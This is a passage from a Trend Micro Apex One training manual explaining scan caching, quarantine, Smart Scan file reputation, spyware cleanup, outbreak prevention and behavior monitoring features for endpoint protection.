The cache for a threat-free file expires within a certain number of days (the time period is also
configurable). When scanning occurs on, or after the cache expiration, the Security Agent
removes the expired cache and scans the file for threats. If the file is threat-free and remains
unmodified, the cache of the file is added back to the on demand scan cache file. If the file is
threat-free but was recently modified, the cache is not added and the file will be scanned again
on the next scan.

The cache for a threat-free file expires to prevent the exclusion of infected files from scans, as
illustrated in the following examples:
• It is possible that a severely outdated pattern file may have treated an infected,
unmodified file as threat-free. If the cache does not expire, the infected file remains in
the system until it is modified and detected by Real-time Scan.
• If a cached file was modified and Real-time Scan is not functional during the file
modification, the cache needs to expire so that the modified file can be scanned for
threats.

The number of caches added to the on-demand scan cache file depends on the scan type and its
scan target. For example, the number of caches may be less if the Security Agent only scanned
200 of the 1,000 files in the endpoint during Manual Scan.

If on-demand scans are run frequently, the on-demand scan cache file reduces the scanning time
significantly. In a scan task where all caches are not expired, scanning that usually takes 12
minutes can be reduced to 1 minute. Reducing the number of days a file must remain unmodified
and extending the cache expiration usually improve the performance. Since files must remain
unmodified for a relatively short period of time, more caches can be added to the cache file. The
caches also expire longer, which means that more files are skipped from scans.

If on-demand scans are seldom run, you can disable the on-demand scan cache since caches
would have expired when the next scan runs.

Quarantining Detected Malware


The Quarantine action instructs Security Agents to physically send detected malware to the Apex One
Server, where it is stored in a centralized quarantine folder for future analysis.

When the Agent detects a malware instance that it is set to quarantine, it moves the file to its
...\Security Agent\SUSPECT folder. Afterwards, the Agent initiates the process of transferring the
malware to a folder called ...\VIRUS on the Apex One Server, where it is rendered inert for safe
storage.

© 2019 Trend Micro Inc. Education 179


Lesson 8: Protecting Endpoint Computers From Malware

Apex One administrators control how this folder is used by way of the Quarantine Manager. Click
Administration > Settings > Quarantine Manager.

Two aspects of the quarantine folder are configurable:


• Capacity of the quarantine folder
• The maximum size of the individual malware that the server will accept from an Security Agent

Files stored in the Quarantine folder are renamed according to the following naming convention:
<Security Agent hostname>_<server upload timestamp in Epoch/Unix
time>.<sequence>

The sequence number differentiates files that were uploaded to the server within the same second.To
prevent infected files from being opened, Apex One encrypts the file before quarantining a file or when
backing up a file before cleaning it.

Restoring Quarantined Files


Apex One provides mechanisms to decrypt and then restore the files in case you believe that a
detection was inaccurate.

File Description
These files are found in the ...\SUSPECT\Backup folder and are
Quarantined files on the
automatically purged after 7 days. These files are also uploaded to the
Agent endpoint
designated Quarantine folder on the Apex One Server.
Quarantined files in the
By default, this folder is located on the Apex One Server computer in the
quarantine folder on the
...\PCCSRV\Virus folder.
Server
These are the backup of infected files that Apex One was able to clean.
These files are found in the ...\Backup folder on the Agent endpoint.
To restore these files, users need to move them to the ...\SUSPECT
Backed up encrypted files \Backup folder on the Agent endpoint.
Apex One only backs up and encrypts files before cleaning if you select
Backup files before cleaning in Agents > Agent Management > Settings >
Scan Settings > {Scan Type} > Action tab.

180 © 2019 Trend Micro Inc. Education


Lesson 8: Protecting Endpoint Computers From Malware

Note: Restoring an infected file may spread the virus/malware to other files and computers. Before
restoring the file, isolate the infected endpoint and move important files on this endpoint to a
backup location.

Central Quarantine Restore


The Central Quarantine Restore feature allows you to search for files in the quarantine directory and
perform SHA1 verification checking to ensure that the files you want to restore have not been
modified in any way.

If the file is on the Security Agent, the VSEncode tool can be used to restore files from quarantine.
1 In Windows Explorer, navigate to the following folder on the Security Agent computer:
...\Security Agent\
2 Double-click VSEncode.exe. A list of files found in the ...\SUSPECT\Backup folder is
displayed.
3 Click to select a file and click Restore.
4 Specify the folder where to restore the file and click OK. The file is restored to the specified
folder.

Note: The tool can only restore one file at a time.

Smart Scan
In addition to conventional pattern-based detection, Apex One offers Smart Scan, as a feature of the
Trend Micro Smart Protection Network.

Smart Scan shifts much of the malware and spyware scanning functionality to a Smart Protection
Server. It keeps local pattern files small and reduces the size and number of updates required by Agents.

The move to in-the-cloud protection is driven by two considerations:

© 2019 Trend Micro Inc. Education 181


Lesson 8: Protecting Endpoint Computers From Malware

• Malware creation is outstripping traditional malware knowledge deployment. By the time a


malware is recognized, it has already changed.
• As patterns grow in power, they grow in size. An inescapable consequence of a rise in the
number of malware is accelerated growth of anti-malware patterns. As things currently stand,
network administrators now have to be careful about when they schedule their updates, to avoid
network disruption.
To address these conditions, Trend Micro re-thought how it deployed malware knowledge to its
protection products. Instead of pre-deploying anti-malware knowledge to the end points, with
the resulting deployment delay and bandwidth issues, this knowledge is now deployed on-
demand from a centralized database that is updated more frequently than traditional methods
through a mechanism called File Reputation.

Smart Scan provides the following features and benefits:


• Reduces the overall time it takes to deliver protection against emerging threats
• Reduces network bandwidth consumed during pattern updates. The bulk of pattern definition
updates only needs to be delivered to the cloud and not to many endpoints
• Reduces the cost and overhead associated with corporate-wide pattern deployments
• Lowers kernel memory consumption on endpoints. Consumption increases minimally over time
• Provides fast, real-time security status lookup capabilities in the cloud and therefore increases
overall protection

By default this option is set to on. Agents that are implementing the Smart Protection Network solution
use the following components:
• Smart Scan Agent Pattern
The pattern file contains complete threat information for all malware that is currently in the
wild.
• Smart Query Filter
This compressed index file references complete threat information that is stored in the Smart
Scan Pattern on the Smart Protection Server.
• Smart Scan Pattern
This pattern file stores information for virus confirmation and actions to proceed in case of
cleaning and is located on the Smart Protection Server.

File Reputation
File Reputation is an implementation of malware identification through the use of Cyclic Redundancy
Check (CRC) values. Cyclic Redundancy Check information can be divided into two parts:
• Part 1 - Used for initial malware identification
• Part 2 - Used for malware confirmation

The following diagram represents a file that has been infected by a virus.

Virus part 1 Virus part 2


(Jump code) File contents (Main portion)

Jump code

182 © 2019 Trend Micro Inc. Education


Lesson 8: Protecting Endpoint Computers From Malware

When a virus infects a file, it typically appends a part of itself to the front of the file. This serves two
purposes:
• To keep other instances of the virus from re-infecting an already infected file, thereby
ensuring efficient propagation.
• To ensure that the virus code in the file runs first, whenever the file is opened this front-
appended portion often contains a jump command to the main portion of the virus, which is
located elsewhere in the file.

For this kind of virus, the CRC information in part 1 would be used to identify the first part of the
virus added to the front of the file.

Virus part 1 Virus part 2


(Jump code) File contents (Main portion)

CRC part 1

The scan engine uses this information to detect if a file has been infected with a specific virus.

After detecting the first part of the virus using part 1 of the CRC information, the scan engine looks
for the corresponding part 2 of the CRC for additional identification information about the remaining
portion of the virus and to confirm that the file is indeed a virus.

To locate part 2 of the CRC information, the scan engine requires information about its expected
location within the file. This information is stored in what pattern builders call the CRC table, and the
location within the file is called its offset.

Offset

Virus part 1 Virus part 2


(Jump code) File contents (Main portion)

CRC part 2

Once the virus has been identified, the scan engine requires information to clean/remove the virus.
This information comes from the Smart Protection Server. Once the scan engine retrieves the
cleaning/removal information that corresponds to the identified virus, it is then able to take action
against the virus.

© 2019 Trend Micro Inc. Education 183


Lesson 8: Protecting Endpoint Computers From Malware

File Reputation addresses the needs enumerated in the previous section by de-constructing the
existing pattern.
Smart Filter generated based on CRC part 1 data

New pattern External database


(Smart Query filter) (Smart Scan Pattern)

CRC part 1 CRC part 1

CRC part 2

Virus info
Non-CRC data

CRC and virus


info for
in-the-wild
malware

Non-CRC pattern
(Smart Scan
Agent Pattern)

Security Agent

Note the following changes to the existing pattern:


• CRC and virus information is still stored locally for malware that are classified as in-the-wild.
This means that the only malware information that is available locally corresponds to
malware that is actively doing harm. This information resides in the Smart Scan Agent
Pattern file.
• CRC and virus information for malware that are no longer considered in-the-wild is moved to
an external database called the Smart Scan Pattern. This pattern contains all the CRC Parts 1
and 2 information of the traditional pattern. Non-CRC data is also stored in the Smart Scan
Pattern.
• A compressed copy of CRC Part 1 information, for not-in-the-wild malware, is moved to a new
pattern called the Smart Query Filter, which the Security Agent uses to determine when to
query the external database for matching Part 2 information. This serves as a kind of index
to the information in the external database.

Note: Both the Smart Query Filter and Smart Scan Agent Pattern reside on the Security Agent.

External CRC Database


Components on the Security Agent are responsible for looking for malware and taking action upon
them when found. However, the knowledge required to identify malware does not completely reside
within the product itself, part of this knowledge is located externally.

The CRC database contains CRC information that corresponds to known malware. This database
resides on the Smart Protection Server. Security Agents can either refer to the global Trend Micro
Smart Protection Network, or a local Smart Protection Server if it is available.

184 © 2019 Trend Micro Inc. Education


Lesson 8: Protecting Endpoint Computers From Malware

These elements work together as shown below.

Security Agent Smart Protection Server

ΠReference Smart Scan


Agent Pattern for local
verification

 Calculate CRC Part 1


Ž Submit CRC Part 1
Smart Scan
 Pattern query
 Returns corresponding CRC Part 2 (for CRC Part 2)

‘ Malware identification
’ Virus ID query
Smart Scan
” Returns cleaning/removal “ Pattern query
instructions from virus info (for virus info)

• Remove malware

1 Reference Smart Scan Agent Pattern


Each time the Security Agent scans a file, it first uses the local pattern file to check if the
scanned content contains malware and obtain cleaning instructions. It does this by referencing
information in the Smart Scan Agent Pattern. The Agent uses this to perform the In-the-wild
verification and clean/remove these active viruses.
2 Calculate CRC Part 1
If the content looks suspicious but the malware cannot be detected and cleaned using the local
pattern files, it calculates a Cyclic Redundancy Check (CRC) sum for the initial portion of the
content (CRC Part 1).
3 Submit CRC Part 1
The Agent submits the CRC Part 1 sum to the local or in-the-cloud File Reputation Server on the
Smart Protection network to query the malware database for all records matching the
calculated CRC Part 1.
4 Smart Scan Pattern query for CRC Part 2
In this step, the Smart Protection Server uses the CRC Part 1 value to query for matching CRC
Part 2 information, which enables the scan engine to confirm that the suspect file is indeed
malware.
The CRC Part 2 information is stored in a database on the Smart Protection Server called the
Smart Scan Pattern.
By design, the Agent only waits for a response from the Smart Protection Server for a specific
period of time (a maximum of 500 milliseconds). For this brief period, the scan engine locks the
file. If the scan engine is unable to query the Smart Protection Server, the server-side processing
portion of this step does not occur, and the Agent attempts to query another Smart Protection
Server if one is available, or proceeds using offline protection.
5 Reply with Corresponding CRC Part 2
If the CRC information sent in the query matches CRC Part 1 information in the Smart Scan
Pattern, the Smart Protection Server returns all the corresponding CRC Part 2 records to the
Agent.

© 2019 Trend Micro Inc. Education 185


Lesson 8: Protecting Endpoint Computers From Malware

6 Malware identification
When the Agent receives the CRC Part 2 information from the Smart Protection Server, it passes
the information to the scan engine to perform matching operations. If no match is found, the file
is safe and the scanning process ends.
7 Virus ID query
If a match is found, the Agent sends a second query to the Smart Protection Server for
information about how to clean/remove the malware. Instead of sending CRC information like in
the first query, the Agent sends the Virus ID of the CRC Part 2 record of the malware that was
detected.
8 Smart Scan Pattern query
The Smart Protection Server then searches for the virus information that corresponds to this
Virus ID submitted to retrieve cleaning instructions.
9 Cleaning instructions returned to Agents
Once the virus information is retrieved, the Smart Protection Server returns this to the Agent
for use by the scan engine.
The Agent waits for a maximum of 500 milliseconds for the Smart Protection Server to reply. If
the Agent does not receive a timely reply, the Agent will abandon the primary action, in favor of
the secondary action. A failure in this operation would cause the Agent to quarantine the
malware instead of cleaning it.
10 Remove Malware
Finally, the Security Agent receives the virus information from the Smart Protection Server, and
the scan engine uses this information to clean/remove the virus.

Best Practice: Do not use Smart Scan if the computer doesn't have reliable network connectivity to
the Trend Micro Smart Protection Network or your Smart Protection Server.

CRC Caching
The CRC cache contains the following information:
• Malware confirmation CRC information
• Malware removal information (VINFO)

Apex One uses both types of information during the local verification step of the File Reputation
operation.

The ability of an offline Agent's scan engine to act upon suspected malware is entirely dependent on
information in the cache. This information depends on types of cache.

186 © 2019 Trend Micro Inc. Education


Lesson 8: Protecting Endpoint Computers From Malware

The following table describes what the Security Agent does in each of the following conditions:

CRC info Virus info Offline Behavior


File is entered in suspicious file list for re-scanning, and is allowed to pass.
x x No action is taken upon the file.
Since virus information is unavailable, the malware cannot be cleaned. If
√ x the first action is set to clean, then the Security Agent will perform the
second action.

√ √ Security Agent cleans the virus based on information already in the cache.

Malware detected in offline conditions will be re-scanned once access to the Smart Protection Server
is restored.

Cache.dat contains a snapshot of the contents of the memory-only CRC cache when the Security
Agent shuts down. It serves as a repository of the CRC and VINFO information already retrieved in
previous queries. When the Security Agent starts up, it reads this file to re-populate the cache.

The information in cache.dat is written in binary format, so it is unreadable. The only way to read
the information that is stored in the CRC cache is by way of a command line tool called
DumpCache.exe. A sample of the tool's output is shown below.

The sample above shows Count=22, indicating there were 22 entries in the cache.

CRC Cache Updates

The CRC information that an Security Agent retrieves from the Smart Protection Server is
stored in its memory-resident CRC cache. This allows the Agent to re-use information retrieved
in previous queries, thereby reducing bandwidth consumption.

If the Smart Scan pattern on the Smart Protection Server is updated, there is a probability that
the information in the cache is rendered either obsolete or incomplete. In which case, the
information must either be updated by way of CRC cache updates, or purged entirely and
recreated.

© 2019 Trend Micro Inc. Education 187


Lesson 8: Protecting Endpoint Computers From Malware

Spyware/Grayware Protection
Spyware and grayware comprises applications and components that collect information to be
transmitted to a separate system or collected by another application. Spyware/grayware detections,
although exhibiting potentially malicious behavior, may include applications used for legitimate
purposes such as remote monitoring.

Apex One uses the Spyware Scanning API (SSAPI) to deal with spyware. This scan engine uses a variety
of internal scanning functions to remove spyware-related files, as well as the changes these files make in
various system areas (for example, Windows registry, shortcuts, etc.).

Ntrtscan.exe is the Security Agent component that is responsible for scanning functionality. For this
purpose, it calls both VSAPI and SSAPI scan engines.

Is the
VSAPI detects Y Use SSAPI
Start malware
malware spyware? to remove
malware

Use VSAPI to
remove malware

End

VSAPI
VSAPI is responsible for real-time spyware detection. Since spyware always involves a file
component, these will still be detectable using conventional file scanning techniques.

Spyware removal, however, requires more than just removal of spyware-related files. Cookies, for
example, not only reside in the user's cookie folder but also in a special registry for cookies. To
effectively remove cookies, the latter must also be addressed. VSAPI lacks this ability to remove
spyware-related alterations in different system areas. This is why SSAPI is part of the process.

SSAPI
Once VSAPI detects the creation of a spyware file-component on the system, it passes this
information to Ntrtscan.exe, which then calls SSAPI to remove the spyware.

SSAPI can detect spyware based on either signatures or changes from a specific baseline. SSAPI
signatures are stored in a definition file.

188 © 2019 Trend Micro Inc. Education


Lesson 8: Protecting Endpoint Computers From Malware

Enabling SSAPI Logs

Scanner-specific communications all use SSAPI log entries to show the scanner's actions. To
generate these logs, the following registry entry must be added:
HKLM\SOFTWARE\TrendMicro\PC-cillinNTCorp\CurrentVersion\Misc
Dwords: EnableSSAPILog = 1

The debug log is created in the location specified for the Security Agent debug log.

Digital Signatures

SSAPI checks the digital signatures of files that VSAPI recognizes as spyware. If the digital
signature of the file identified as spyware exists in the whitelist, the file is not removed. This
applies to all types of scanning (e.g., real-time, manual, etc.).

Signature
Scan file Call SSAPI to Check for digital
in
Y Do not remove
with VSAPI clean spyware signature spyware
whitelist?

Remove spyware

Trend Micro maintains a list of known spyware/grayware that can be allowed by adding to your
own whitelist. Locate the application you would like to approve and add it to the Approved list.

To access the Spyware/Grayware Approved List, click Agents > Agent Management. Click
Settings > Spyware/Grayware Approved List.

A file's digital signature can be seen in its properties, particularly in the digital signature tab.

© 2019 Trend Micro Inc. Education 189


Lesson 8: Protecting Endpoint Computers From Malware

Damage Cleanup Services


Damage Cleanup Services (DCS) remove files that cannot be cleaned by the Virus Scan Engine, such
as files infected with Trojans. Damage Cleanup Services cleans computers of file-based and network
viruses, and virus and worm remnants (Trojans, Registry entries, viral files) through a fully-
automated process.

Damage Cleanup Services preforms the following functions:


• Detects and removes live Trojans
• Kills processes that Trojans create
• Repairs system files that Trojans modify
• Deletes files and applications that Trojans drop

Damage Cleanup Services run automatically in the background, and users are not even aware when
it runs. However, Apex One may sometimes notify the user to restart their endpoint to complete the
process of removing a Trojan.

Configuration settings for Damage Cleanup Services can be found in Real-Time Scan Settings >
Action > Damage Cleanup Services.

190 © 2019 Trend Micro Inc. Education


Lesson 8: Protecting Endpoint Computers From Malware

Damage Cleanup Services does not run cleanup on probable virus/malware unless Run cleanup when
probable virus/malware is detected is selected. Note that you can only select this option if the action
on probable malware is not Deny Access.

For example, if the Security Agent detects probable malware during Real-time Scan and the action is
quarantine, the Security Agent first quarantines the infected file and then runs cleanup if necessary.

Advanced Cleanup

In addition to the standard cleanup actions, Manual, Scheduled and Scan Now setting also
includes an advanced cleanup option. With this enabled, the Security Agent stops activities by
rogue security software (also known as FakeAV) and certain rootkit variants. The Security Agent
also uses advanced cleanup rules to proactively detect and stop applications that exhibit FakeAV
and rootkit behavior.

Damage Cleanup Services Components


Damage Cleanup Services consist of the following engine, template and driver components:
• Damage Cleanup Engine: The Damage Cleanup Engine scans for and removes Trojans and
Trojan processes. This engine supports 32-bit and 64-bit platforms.
• Damage Cleanup Template: The Damage Cleanup Template is used by the Damage Cleanup
Engine to identify Trojan files and processes so the engine can eliminate them.
• Early Boot Cleanup Driver: The Trend Micro Early Boot Cleanup driver loads before the
operating system drivers which enables the detection and blocking of boot-type rootkits.
After the Security Agent loads, Trend Micro Early Boot Clean Driver calls Damage Cleanup
Services to clean the rootkit.

Assessment Mode
To help an administrator study the types of files that are flagged as spyware, Apex One provides an
option to prevent Security Agents from deleting spyware, even if they are set to clean.

Unlike other forms of malware, there is little consensus on what constitutes spyware. Cookies are a
good example of this. Like other security companies, Trend Micro can detect and remove cookies.
However, many claim that cookies are not actually spyware.

Assessment Mode give administrators a chance to fine tune their own policies for files addressed as
part of anti-spyware functionality. This assessment period allows the administrator to identify the
files that they want excluded from spyware cleaning, and to add them to the Approved List. After the
assessment period, the Security Agent implements spyware cleaning functionality.

When in assessment mode, Agents will log spyware/grayware detected during scan, but will not
clean spyware/grayware components. Cleaning terminates processes or deletes registries, files,
cookies, and shortcuts.

© 2019 Trend Micro Inc. Education 191


Lesson 8: Protecting Endpoint Computers From Malware

Preventing Outbreaks
To contain outbreaks, Apex One enforces outbreak prevention policies and isolates infected computers
until they are completely risk-free. Attack-specific security policies are deployed to prevent or contain
outbreaks before pattern files are available.

Outbreak Prevention Policy


Outbreak Prevention security policies can include the following:
• Limit/Deny access to shared folders
• Block Ports (only available/visible if Firewall is enabled)
• Deny write access to files and folders (excludes mapped drives)
• Deny access to executable compressed files
• Create mutual exclusion (mutex) handling on malware processes/files (only available if
Unauthorized Change Prevention service is enabled)

During outbreaks, block vulnerable ports that viruses/malware might use to gain access to Security
Agent endpoints.

Note: Configure Outbreak Prevention settings carefully. Blocking ports that are in use makes network
services that depend on them unavailable. For example, if you block the trusted port, Apex One
cannot communicate with the Agent for the duration of the outbreak.

192 © 2019 Trend Micro Inc. Education


Lesson 8: Protecting Endpoint Computers From Malware

Outbreak Notifications
Administrators can be notified when conditions warrant configuring Outbreak Prevention. Click
Administration > Notifications > Outbreak. Configure the outbreak criteria for different categories of
threats.

© 2019 Trend Micro Inc. Education 193


Lesson 8: Protecting Endpoint Computers From Malware

Starting Outbreak Prevention


When warranted, enable Outbreak Prevention to isolate infected endpoint computers. To access the
configuration settings for Outbreak Prevention, go to Agents > Outbreak Prevention, select the
appropriate domain or endpoints and click Start Outbreak Prevention.

194 © 2019 Trend Micro Inc. Education


Lesson 8: Protecting Endpoint Computers From Malware

Select the items to restrict when outbreak prevention is enabling by selecting them in the Policies
section of the Outbreak Prevention Settings.

In addition, a notification message can be displayed to the users when Outbreak Prevention starts.

© 2019 Trend Micro Inc. Education 195


Lesson 8: Protecting Endpoint Computers From Malware

Terminating Outbreak Prevention


When you are confident that an outbreak has been contained and that Apex One has cleaned or
quarantined all infected files, restore network settings to normal by disabling Outbreak Prevention.
Right-mouse click the domain or endpoints using Outbreak Prevention and click Restore Settings.

A message will be displayed on the endpoint computer advising the user that outbreak policies are
no longer being enforced.

196 © 2019 Trend Micro Inc. Education


Lesson 9: Protecting Endpoint Computers Through Behavior Monitoring

Lesson 9: Protecting Endpoint


Computers Through Behavior
Monitoring

Lesson Objectives:

After completing this lesson, participants will be able to:


• Protect an endpoint computer against ransomware
• Protect an endpoint computer against exploits
• Block unrecognized software
• Monitor for malware events

Behavior Monitoring
Behavior Monitoring (TMBMSVR.exe) constantly monitors endpoints for unusual modifications to the
operating system or installed software.

Behavior Monitoring in Apex One protects endpoints through the following techniques:
• Malware behavior blocking
• Ransomware protection
• Anti-exploit protection
• Fileless malware protection
• Newly encountered program protection
• Event monitoring
• Certified Safe Software Service

© 2019 Trend Micro Inc. Education 197


Lesson 9: Protecting Endpoint Computers Through Behavior Monitoring

Malware Behavior Blocking


Malware Behavior Blocking provides a necessary layer of additional threat protection from programs
that exhibit malicious behavior. It observes system events over a period of time. As programs
execute different combinations or sequences of actions, Malware Behavior Blocking detects known
malicious behavior and blocks the associated programs. Use this feature to ensure a higher level of
protection against new, unknown, and emerging threats.

Behavior Monitoring can detect malicious scripts executed by legitimate Windows programs and the
true payload path of script files executed by legitimate DLLs to protect endpoints against malware
hidden in fileless attack vectors.

Malware Behavior Monitoring provides the following threat-level scanning for the following:
• Known threats: Blocks behaviors associated with known malware threats
• Known and potential threats: Blocks behavior associated with known threats and takes
action on behavior that is potentially malicious

198 © 2019 Trend Micro Inc. Education


Lesson 9: Protecting Endpoint Computers Through Behavior Monitoring

Ransomware Protection
Ransomware refers to a class of malware that holds a computer hostage until the user pays a
particular amount or abides by specific demands. Ransomware restricts access to the system when
executed and shows messages that force users into paying a ransom or performing a desired action.
There are some ransomware variants that encrypt files found on the system's hard drive. Users are
then forced to pay up in order to decrypt the important or critical files that were altered by the
ransomware due to file encryption. Since these variants can hijack legitimate, normal file encryption
methods to encrypt files, it is difficult to detect.

Behavior Monitoring can detect a specific sequence of events that may indicate a Ransomware
attack. To enable ransomware protection, select the following options under Behavior Monitoring
Settings.

In addition, set the option to automatically backup and restore files changed by suspicious
applications. Apex One does not have the ability to decrypt files if encrypted by malware.

The AEGIS service can receive and reply to exploit events, and terminate processes if it meets
violation rules.

© 2019 Trend Micro Inc. Education 199


Lesson 9: Protecting Endpoint Computers Through Behavior Monitoring

Anti-Exploit Protection
Anti-exploit protection works in conjunction with program inspection to monitor the behavior of
programs and detect abnormal behavior that may indicate that an attacker has exploited a program
vulnerability. Once detected, Behavior Monitoring terminates the program processes.

Anti-exploit Protection requires that you select Enable program inspection to detect and block
compromised executable files.

Fileless Malware Protection


NEW

Fileless malware is a malicious program or code that runs directly from memory. While the infection
is live, the attacker can steal sensitive information or download persistent malware. Apex One is able
to detect and block these types of attacks even though they've already started running. These
attacks use other vectors like Windows registry, memory, scheduled tasks and other. The violations
for these kinds of attack are hard to define because the attack may occur on Windows process list
and terminating a system process may cause too many false alarm issues that will greatly impact
users.

In Apex One, fileless malware detection is used deal with such attacks. When Anti-exploit Protection
is enabled on a Security Agent-protected endpoint, fileless protection is enabled as well. Apex One
provides protection for fileless malware with two type of scans:
• Normal Object Scan
• Dynamic Memory Scan

200 © 2019 Trend Micro Inc. Education


Lesson 9: Protecting Endpoint Computers Through Behavior Monitoring

Normal Object Scan

Normal Object Scan is incorporated into the Anti-exploit Protection configuration. When Anti-
exploit Protection is enabled, Normal Object scan is enabled as well.

Normal Object Scan provides protection for four different type of type events that could
potentially not require a file to be executed to distribute malware:
• Windows Management Instrumentation: Windows Management Instrumentation (WMI) is a
standard technology for accessing management information in an enterprise environment.
WMI uses the Common Information Model (CIM) industry standard to represent systems,
applications, networks, devices, and other managed components. WMI provides the ability to
obtain management data from remote computers. Malware taking advantage of weaknesses
in this technology does not reside on separate file or in the Registry but in special database
in the Operating System.
• Schedule Task: The Task Scheduler in Windows enables administrators to automatically
perform routine tasks on a chosen computer.
• BitsJob: Background Intelligent Transfer Service (BITS) is used to download files from or
upload files to HTTP web servers or SMB file servers. BITS continues to transfer files after an
application exits as long as the user who initiated the transfer remains logged on and a
network connection is maintained. BITS will not force a network connection and resumes
transfers after a network connection that had been lost is reestablished or after a user who
had logged off logs back in. Bitsadmin is a windows built-in command-line tool that you can
use to create download or upload jobs and monitor their progress. This tool is usually
skipped by antivirus software due to it being signed by Microsoft.
• RegRun: Registry keys (Run and RunOnce) cause programs to run each time that a user logs
on. This process can be compromised by adding parameters to the program startup.

Dynamic Memory Scan

Dynamic Memory Scan (MIP3) uses exploit events and suspicious memory events as the trigger
to apply memory scanning on target processes. Other trigger points for memory scans can not
capture fileless attacks and a result, this new memory scan is introduced in Apex One.

© 2019 Trend Micro Inc. Education 201


Lesson 9: Protecting Endpoint Computers Through Behavior Monitoring

Dynamic Memory Scan is configured in the Real-Time Scan Settings by enabling Quarantine
malware variants detected in memory. In addition, the Unauthorized Change Prevention Service
and Advanced Protection Service must be enabled.

202 © 2019 Trend Micro Inc. Education


Lesson 9: Protecting Endpoint Computers Through Behavior Monitoring

The Behavior Monitoring Rule setting Enable program inspection to detect and block
compromised executable files must also be enabled for this type of fileless scan.

Newly Encountered Program Protection


Behavior Monitoring works in conjunction with Web Reputation Services and Real-time Scan to verify
the prevalence of files downloaded through web channels, email applications, or Microsoft Office
macro scripts. After detecting a newly encountered file, administrators can choose to prompt users
before executing the file. Trend Micro classifies a program as newly encountered based on the
number of file detections or historical age of the file as determined by the Smart Protection
Network.

Census describes the rating of files based on their prevalence and maturity. Prevalence refers to how
common a file is, while maturity refers to the period of time between the first time a file was
recorded in the Census server and the time of the query.

Apex One provides protection for Zero-Day Attacks through the Behavior Monitoring Engine, Web
Reputation, and File Census to provide a score that VSAPI can use to take action on a possible
malicious file.

Trend Micro classifies a program as newly encountered based on the number of file detections or
historical age of the file as determined by the Smart Protection Network.

© 2019 Trend Micro Inc. Education 203


Lesson 9: Protecting Endpoint Computers Through Behavior Monitoring

Behavior Monitoring scans the following file types for each channel:
• HTTP and HTTPS: Scans .exe files
• Email applications: Scans .exe and compressed .exe files in unencrypted .zip and .rar
files

The decision to block suspect applications relies on the census value as in the following table:

File Type Blocking Threshold


HTTP/HTTPS Prevalence < 20 and Maturity < 3 months
Prevalence < 20
E-MAIL OR
Prevalence < 100 and Maturity < 3 months

In the Behavior Monitoring Settings windows, enable Monitor newly encountered programs
downloaded through HTTP or email applications. After blocking an application, administrators can
choose to prompt users before executing the file or merely log the event.

Note: If using Microsoft System Center Configuration Manager to distribute software, do not enable
the Prompt User setting as the end user will not see the prompt and the software may not install
properly.

204 © 2019 Trend Micro Inc. Education


Lesson 9: Protecting Endpoint Computers Through Behavior Monitoring

Event Monitoring
Event Monitoring provides a more generic approach to protecting against unauthorized software
and malware attacks. It monitors system areas for certain events, allowing administrators to
regulate programs that trigger such events. Use Event Monitoring if you have specific system
protection requirements that are above and beyond what is provided by Malware Behavior Blocking.

In the Behavior Monitoring Settings windows, click Enable Event Monitoring. Expand Specify detail
settings and select the appropriate items to monitor.

• Duplicated System File: Many malicious programs create copies of themselves or other
malicious programs using file names used by Windows system files. This is typically done to
override or replace system files, avoid detection, or discourage users from deleting the
malicious files.
• Hosts File Modification: The Hosts file matches domain names with IP addresses. Many
malicious programs modify the Hosts file so that the web browser is redirected to infected,
non-existent, or fake websites.
• Suspicious Behavior: Suspicious behavior can be a specific action or a series of actions that
is rarely carried out by legitimate programs. Programs exhibiting suspicious behavior should
be used with caution.
• New Internet Explorer Plug-in: Spyware/grayware programs often install unwanted Internet
Explorer plug-ins, including toolbars and Browser Helper Objects.

© 2019 Trend Micro Inc. Education 205


Lesson 9: Protecting Endpoint Computers Through Behavior Monitoring

• Internet Explorer Setting Modification: Many virus/malware change Internet Explorer


settings, including the home page, trusted websites, proxy server settings, and menu
extensions.
• Security Policy Modification: Modifications in Windows Security Policy can allow unwanted
applications to run and change system settings.
• Program Library Injection: Many malicious programs configure Windows so that all
applications automatically load a program library (DLL). This allows the malicious routines in
the DLL to run every time an application starts.
• Shell Modification: Many malicious programs modify Windows shell settings to associate
themselves to certain file types. This routine allows malicious programs to launch
automatically if users open the associated files in Windows Explorer. Changes to Windows
shell settings can also allow malicious programs to track the programs used and start
alongside legitimate applications.
• New Service: Windows services are processes that have special functions and typically run
continuously in the background with full administrative access. Malicious programs
sometimes install themselves as services to stay hidden.
• System File Modification: Certain Windows system files determine system behavior,
including startup programs and screen saver settings. Many malicious programs modify
system files to launch automatically at startup and control system behavior.
• Firewall Policy Modification: The Windows Firewall policy determines the applications that
have access to the network, the ports that are open for communication, and the IP addresses
that can communicate with the computer. Many malicious programs modify the policy to
allow themselves to access to the network and the Internet.
• System Process Modification: Many malicious programs perform various actions on built-in
Windows processes. These actions can include terminating or modifying running processes.
• New Startup Program: Malicious applications usually add or modify autostart entries in the
Windows registry to automatically launch every time the computer starts.

Event Monitoring Actions

When Event Monitoring detects a monitored system event, it performs the action configured for
the event.
• Assess: The Security Agent always allows programs associated with an event to run and
logs the event for assessment. This is the default action for all monitored system events.
• Allow: The Security Agent always allows programs associated with an event to run.
• Ask when necessary: The Security Agent prompts users to allow or deny programs
associated with an event from running and adds the programs to the exception list. If the
user does not respond within a certain time period, the Security Agent automatically
allows the program to run. The default time period is 30 seconds.
• Deny: The Security Agent always blocks programs associated with an event from
running and logs the event. After blocking a program with notifications enabled, the
Security Agent displays a notification on the endpoint.

206 © 2019 Trend Micro Inc. Education


Lesson 9: Protecting Endpoint Computers Through Behavior Monitoring

Note: Since Event Monitoring creates a lot of logs, by default, Behavior Monitoring violations will be
collected for a period of 1 hour, then uploaded to the server. In environments with many Agents, if
all logs were sent separately like normal detections, the server would be flooded.
On the Agent this value will appear in the Windows Registry under:
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\TrendMicro\PC-cillinNTCorp\
CurrentVersion\AEGIS\SendBMLogPeriod

Behavior Monitoring Exception List


The Behavior Monitoring exception list contains programs that Security Agents do not monitor using
Behavior Monitoring.
• Approved Programs: The Security Agent allows all programs in the Approved Programs list to
bypass Behavior Monitoring scanning.

Note: Although Behavior Monitoring does not take action on programs added to the Approved
Programs list, other scan features (such as file-based scanning) continue to scan the program
before allowing the program to run.

• Blocked Programs: The Security Agent blocks all programs in the Blocked Programs list.

© 2019 Trend Micro Inc. Education 207


Lesson 9: Protecting Endpoint Computers Through Behavior Monitoring

The Behavior Monitoring Approved/Blocked List supports the use of wildcard characters when
defining file path, file name, and file extension exception types. Use the following tables to properly
format your exception lists to ensure that Apex One excludes the correct files and folders from
scanning.

Supported wildcard characters:


